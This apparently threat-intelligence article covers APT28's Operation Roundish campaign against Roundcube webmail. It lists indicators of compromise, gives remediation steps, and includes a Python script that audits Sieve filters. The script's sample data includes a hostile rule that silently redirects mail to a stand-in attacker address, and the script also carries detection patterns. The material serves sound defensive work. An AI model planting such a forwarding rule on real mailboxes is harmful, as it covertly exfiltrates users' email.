FancyBear, a Russian state-linked hacking group, made an operational-security mistake that gave security researchers an unusually clear picture of an active espionage campaign against government and military organizations across Europe. On March 11, 2026, the threat intelligence company Hunt.io published its findings on a campaign it calls Operation Roundish.
The findings came from an open directory that was first scanned on January 13, 2026. The UK's NCSC attributes FancyBear, also known as APT28, Forest Blizzard, and Sednit, to Unit 26165 of Russia's GRU military intelligence. What began as a focused webmail exploitation campaign had been running quietly for more than a year before the group accidentally left its server directory listing exposed to the internet.
The exposure came from a Namecheap Virtual Private Server in the US with the IP address 203.161.50.145. If your organization runs Roundcube with the twofactor_gauthenticator plugin, treat every current TOTP secret as potentially compromised and rotate them now: a stolen seed lets the attacker generate valid second-factor codes indefinitely, so a password reset alone does not close the door. Administrators should also audit Sieve email-filtering rules for entries that silently forward mail to unauthorized addresses, especially rules named "SystemProtect" or "SystemHealthChek."
Block all connections to the C2 IP address 203.161.50.145 and the domain zhblz.com. The most important immediate steps for any affected organization are to apply the Roundcube patch for CVE-2023-43770 and to monitor webmail infrastructure for signs of XSS injection.
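The Sieve audit recommended above is easy to script. The following is an added example, not code from Hunt.io or from the article; it assumes the rule-name comment format that Roundcube's managesieve plugin writes (`# rule:[Name]`) and uses a constructed sample script and constructed addresses (corp.example, attacker.example). It flags any `redirect` action whose target is outside your own domains, and any rule whose name matches the two Operation Roundish indicators, regardless of where it forwards.

```python
import re
from dataclasses import dataclass

# Rule names reported for the Operation Roundish Sieve filters (compared case-insensitively).
SUSPECT_RULE_NAMES = {"systemprotect", "systemhealthchek"}

# Roundcube's managesieve plugin labels each rule with a "# rule:[Name]" comment line.
RULE_HEADER = re.compile(r'^[ \t]*#[ \t]*rule:\[(.*?)\][ \t]*$', re.MULTILINE)

# A redirect action; ":copy" keeps a local copy so the mailbox owner sees nothing missing.
REDIRECT = re.compile(r'\bredirect\b(\s+:copy)?\s+"([^"]+)"\s*;', re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    target: str
    reasons: list


def split_rules(script):
    """Yield (rule_name, body) pairs; text before the first header gets the name ''."""
    parts = RULE_HEADER.split(script)  # [preamble, name1, body1, name2, body2, ...]
    yield "", parts[0]
    for i in range(1, len(parts), 2):
        yield parts[i], parts[i + 1]


def audit_sieve(script, internal_domains):
    """Return a Finding for every redirect that is external or sits in a suspect-named rule."""
    internal = {d.lower() for d in internal_domains}
    findings = []
    for name, body in split_rules(script):
        for match in REDIRECT.finditer(body):
            target = match.group(2)
            domain = target.rsplit("@", 1)[-1].lower()
            reasons = []
            if domain not in internal:
                reasons.append("forwards to external domain")
            if name.strip().lower() in SUSPECT_RULE_NAMES:
                reasons.append("rule name matches Operation Roundish IoC")
            if reasons and match.group(1):
                reasons.append("uses :copy (silent forwarding)")
            if reasons:
                findings.append(Finding(name, target, reasons))
    return findings


# Constructed sample: two benign rules, two in the style described in the article.
SAMPLE_SIEVE = """\
require ["copy", "fileinto"];
# rule:[Move newsletters]
if header :contains "subject" "newsletter"
{
    fileinto "Newsletters";
}
# rule:[Helpdesk tickets]
if address :is "to" "support@corp.example"
{
    redirect "helpdesk@corp.example";
}
# rule:[SystemProtect]
if true
{
    redirect "archive@corp.example";
}
# rule:[SystemHealthChek]
if true
{
    redirect :copy "collector@attacker.example";
}
"""

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SIEVE, ["corp.example"]):
        print(f"[{f.rule}] -> {f.target}: {', '.join(f.reasons)}")
```

Run it over every user's active script (for Dovecot, the `.dovecot.sieve` symlink target or the files under the managesieve storage directory). A redirect to your own domain in a rule named like the indicators is still reported, because the rule name is the attacker's fingerprint even if the forwarding address has since been changed.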